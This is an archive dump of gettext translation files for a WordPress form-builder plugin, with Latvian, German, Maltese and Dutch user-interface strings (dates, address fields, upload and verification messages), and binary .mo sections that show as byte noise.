Last-Translator: 
Language-Team: 
Language: lv
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Poedit-KeywordsList: _;gettext;gettext_noop;__
X-Poedit-Basepath: .
X-Generator: Poedit 1.7.6
X-Poedit-SearchPath-0: C:\wamp\www\wordpress\wp-content\plugins\form-maker
AprīlisPlatība kodsAugustsCentiemPilsētaValstsDecembrisDolāruKļūda, e-pasts nav nosūtīts.Kļūda, fails nevar pārvietot.Kļūda, nepareizu drošības kodu.FebruārisPirmaisNogo JanvārisJūlijsJūnijsPēdējaisMartsMaijsVidusNekas netika iesniegts.NovembrisOktobrisTālruņa numursPasta / Zip kodsDaudzumureset Izvēlieties DateIzvēlieties lauks SeptembrisAtvainojiet, Jums nav atļauts augšupielādēt šo faila tipu.Valsts / Rajons / reģionsIelaAdrese līnija 2TheFails pārsniedz pieļaujamo lielumuŠis lauks %s nepieciešams unikāls ieraksts un šī vērtība jau bija iesniegts.Tas nav derīga e-pasta adresi.Kā J;us uzrunātLīdzPārbaude saite ir nederīgs.Jūs nevarat izvēlēties bijušo datumus. Izvēlieties datumu, sākot no pašreizējā viena.Jūsu e-pasta adrese jau ir pārbaudīta.Jūsu e-pasts ir veiksmīgi pārbaudīta.Jūsu e-pasta pārbaude ir beigusies.Veidlapas tika iesniegta veiksmīgi.Jūsu ip ir melnajā sarakstā. Lūdzu, sazinieties ar vietnes administratoruTavs rezultāts ir mazāks nekā lauks ir obligāts.vērtība ir starp languages/form_maker-de_DE.mo000060400000007360152434416630012141 0ustar00��5�Gl��	����������%+03;@EJPT[r{����
��	�7�*9O$SKx"����L'[*�&�%�A�=\o��A
G
O
V
]
c
h
q
$y
+�
*�
�
�
#,26F`i
q����	�B�
2@G3L]�'�

!
b1
,�
*�
)�
,[C%���4%
$#,	5'2 -
10+/&!*.")3(AprilArea CodeAugustCentsCityCountryDecemberDollarsError, email was not sent.Error, file cannot be moved.Error, incorrect Security code.FebruaryFirstFromGOJanuaryJulyJuneLastMarchMayMiddleNothing was submitted.NovemberOctoberPhone NumberPostal / Zip CodeQuantityResetSelect a DateSelect a FieldSeptemberSorry, you are not allowed to upload this type of file.State / Province / RegionStreet AddressStreet Address Line 2TheThe file exceeds the allowed size ofThis field %s requires a unique entry and this value was already submitted.This is not a valid email address.TitleToVerification link is invalid.You cannot select former dates. Choose a date starting from the current one.Your email address is already verified.Your email has been successfully verified.Your email verification has timed out.Your form was successfully submitted.Your ip is blacklisted. Please contact the website administrator.Your score should be less thanfield is required.value must be betweenProject-Id-Version: form_maker
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2015-05-22 16:52+0400
PO-Revision-Date: 2015-05-22 16:52+0400
Last-Translator: 
Language-Team: 
Language: de
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Poedit-KeywordsList: _;gettext;gettext_noop;__
X-Poedit-Basepath: .
X-Generator: Poedit 1.7.6
X-Poedit-SearchPath-0: C:\wamp\www\wordpress\wp-content\plugins\form-maker
AprilVorwahlAugustcents StadtLandDezemberDollar Fehler, E-Mail wurde nicht gesendet.Fehler, kann Datei nicht verschoben werden.Fehler, falschen Sicherheitscode eingeben.FebruarVorname aus gehen JanuarJuliJuniNachnameMärzMaiZweiter VornameNichts wurde eingereicht.NovemberOktoberTelefonnummerPostleitzahlMenge rücksetzen Wählen Sie ein DatumWählen Sie ein Feld SeptemberLeider sind Sie nicht berechtigt, diese Art von Datei hochzuladen.Staat / Provinz / RegionPostanschriftZusatzdie Die Datei überschreitet die zulässige Größe vonDieses Feld %s benötigt einen eindeutigen Eintrag und dieser Wert wurde bereits eingereicht.Dies ist keine gültige E-Mail-Adresse.TitelzuBestätigungs-Link ist ungültig.Sie können keine früheren Daten auszuwählen. Wählen Sie ein Datum ausgehend von der aktuellen.Ihre E-Mail-Adresse ist bereits überprüft.Ihre E-Mail wurde erfolgreich überprüft.Ihre E-Mail-Verifizierung ist abgelaufen.Das Formular wurde erfolgreich übermittelt.Ihre IP wird die schwarze Liste gesetzt. Bitte kontaktieren Sie die Website-Administrator. Ihr Ergebnis sollte kleiner sein als Feld ist erforderlich.Wert muss zwischen languages/form_maker-mt_MT.po000060400000057046152434416630012232 0ustar00msgid ""
msgstr ""
"Project-Id-Version: form_maker\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2015-05-22 17:01+0400\n"
"PO-Revision-Date: 2015-05-22 17:01+0400\n"
"Last-Translator: \n"
"Language-Team: \n"
"Language: mt\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Poedit-KeywordsList: _;gettext;gettext_noop;__\n"
"X-Poedit-Basepath: .\n"
"X-Generator: Poedit 1.7.6\n"
"X-Poedit-SearchPath-0: C:\\wamp\\www\\wordpress\\wp-content\\plugins\\form-"
"maker\n"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:240
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4201
msgid "Street Address"
msgstr "Indirizz Triq"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:243
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4202
msgid "Street Address Line 2"
msgstr "Indirizz Triq Linja 2"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:246
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4203
msgid "City"
msgstr "Belt"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:249
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4204
msgid "State / Province / Region"
msgstr "Stat / Provinċja / Reġjun"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4205
msgid "Postal / Zip Code"
msgstr "Postali / Zip Kodiċi"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:255
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4206
msgid "Country"
msgstr "Pajjiż"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:104
msgid "Connection type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:140
msgid "Type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4189
msgid "January"
msgstr "Jannar"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4190
msgid "February"
msgstr "Frar"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4191
msgid "March"
msgstr "Marzu"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4192
msgid "April"
msgstr "April"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4193
msgid "May"
msgstr "Mejju"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4194
msgid "June"
msgstr "Ġunju"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4195
msgid "July"
msgstr "Lulju"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4196
msgid "August"
msgstr "Awwissu"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4197
msgid "September"
msgstr "Settembru"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4198
msgid "October"
msgstr "Ottubru"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4199
msgid "November"
msgstr "Novembru"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4200
msgid "December"
msgstr "Diċembru"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:77
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:92
msgid "Error, incorrect Security code."
msgstr "Error, il-kodiċi tas-Sigurtà żbaljata."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:106
msgid "Your ip is blacklisted. Please contact the website administrator."
msgstr ""
"Ip tiegħek hija lista sewda. Jekk jogħġbok ikkuntattja l-amministratur "
"websajt"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:325
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:854
msgid "The file exceeds the allowed size of"
msgstr "Il-fajl jeċċedi-daqs permess ta '"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:344
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:869
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2520
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4233
msgid "Sorry, you are not allowed to upload this type of file."
msgstr "Jiddispjacini, m'intix permess biex ittella dan it-tip tal-fajl."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:365
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:890
msgid "Error, file cannot be moved."
msgstr "Żball, fajl ma jistgħux jiġu mċaqalqa."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:743
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1207
#, php-format
msgid ""
"This field %s requires a unique entry and this value was already submitted."
msgstr ""
"Dan il-qasam %s teħtieġ dħul uniku u dan il-valur kien diġà sottomessa."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:895
#, fuzzy
msgid "Error, file destination does not exist."
msgstr "Żball, email ma ntbagħatx."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1434
msgid "Nothing was submitted."
msgstr "Xejn ġiet sottomessa."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2343
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2356
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4047
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4052
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:64
msgid "Your form was successfully submitted."
msgstr "Formola tiegħek ġie negozjat b'suċċess sottomessa."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2351
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4043
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:61
msgid "Error, email was not sent."
msgstr "Żball, email ma ntbagħatx."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:27
msgid "Your email address is already verified."
msgstr "Indirizz email tiegħek diġà verifikata."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:68
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:94
msgid "Your email has been successfully verified."
msgstr "Email tiegħek tkun ġiet ivverifikata b'suċċess."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:71
msgid "Your email verification has timed out."
msgstr "Verifika email tiegħek tkun puntwali out."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:99
msgid "Verification link is invalid."
msgstr "Link verifika huwa invalidu."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1034
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1085
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1156
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1203
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1307
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1379
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1484
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1499
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1673
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1855
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2022
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2155
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2290
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2340
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2457
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2560
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2728
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2918
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3088
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3245
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3386
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3487
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3546
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3661
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3718
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3778
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3892
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3906
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3921
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3936
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4238
msgid "field is required."
msgstr "qasam hija meħtieġa."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1690
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4236
msgid "This is not a valid email address."
msgstr "Din mhix l-indirizz email validu."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2356
msgid ""
"You cannot select former dates. Choose a date starting from the current one."
msgstr ""
"Inti ma tistax tagħżel id-dati ta 'qabel. Agħżel data tal-bidu minn dak "
"attwali."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "The"
msgstr "Il-"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "value must be between"
msgstr "valur għandha tkun bejn"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2893
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2933
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3064
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3101
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3220
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3261
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4212
msgid "Quantity"
msgstr "Kwantità"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3792
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4001
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4002
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4234
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4235
msgid "Your score should be less than"
msgstr "Punteġġ tiegħek għandu jkun inqas minn"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4185
msgid "Title"
msgstr "Titolu"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4186
msgid "First"
msgstr "Ewwel"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4187
msgid "Last"
msgstr "L-aħħar"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4188
msgid "Middle"
msgstr "Nofsani"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4207
msgid "Area Code"
msgstr "Kodiċi Żona"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4208
msgid "Phone Number"
msgstr "Numru tat-telefown:"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4209
msgid "Dollars"
msgstr "Dollaru"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4210
msgid "Cents"
msgstr "Ċenteżmu"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4213
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:300
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:586
msgid "From"
msgstr "Mill"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:305
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:588
msgid "To"
msgstr "Biex"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:29
msgid "You have no permission to view submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:143
msgid "Entries"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:145
msgid "Views"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:147
msgid "Conversion Rate"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:150
msgid "Export to"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:166
msgid "GO"
msgstr "go "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:167
msgid "Reset"
msgstr "Irrisettja "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid "of"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid ""
"submissions are not shown, as the field you sorted by is missing in those "
"submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:357
msgid "Canceled"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:358
msgid "Cleared"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:359
msgid "Cleared by payment review"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:360
msgid "Completed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:361
msgid "Denied"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:362
msgid "Failed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:363
msgid "Held"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:364
msgid "In progress"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:365
msgid "On hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:366
msgid "Paid"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:367
msgid "Partially refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:368
msgid "Pending verification"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:369
msgid "Placed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:370
msgid "Processing"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:371
msgid "Refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:372
msgid "Refused"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:373
msgid "Removed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:374
msgid "Returned"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:375
msgid "Reversed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:376
msgid "Temporary hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:377
msgid "Unclaimed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:472
msgid "Show on Map"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:754
msgid "Total"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:510
msgid "Show Matrix"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:560
msgid "Statistics"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:564
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:568
msgid "Select a Field"
msgstr "Agħżel Qasam "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:583
msgid "Select a Date"
msgstr "Agħżel Data"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:594
msgid "Show"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:626
msgid "Please select the field!"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:723
msgid "Choices"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:724
msgid "Percentage"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:725
msgid "Count"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:747
msgid "Unanswered"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:771
msgid "Address"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:779
msgid "Longitude"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:787
msgid "Latitude"
msgstr ""
languages/form_maker-nl_NL.mo000060400000007105152434416630012200 0ustar00��5�Gl��	����������%+03;@EJPT[r{����
��	�7�*9O$SKx"����L'[*�&�%�A�=\o��A
	G
Q
Z
`
g
l
u
}
-�
 �
�
�
�

%+
/:QZbqz���	�@��
%2)E\����K�"6
%Y

�
@�
�
,4%
$#,	5'2 -
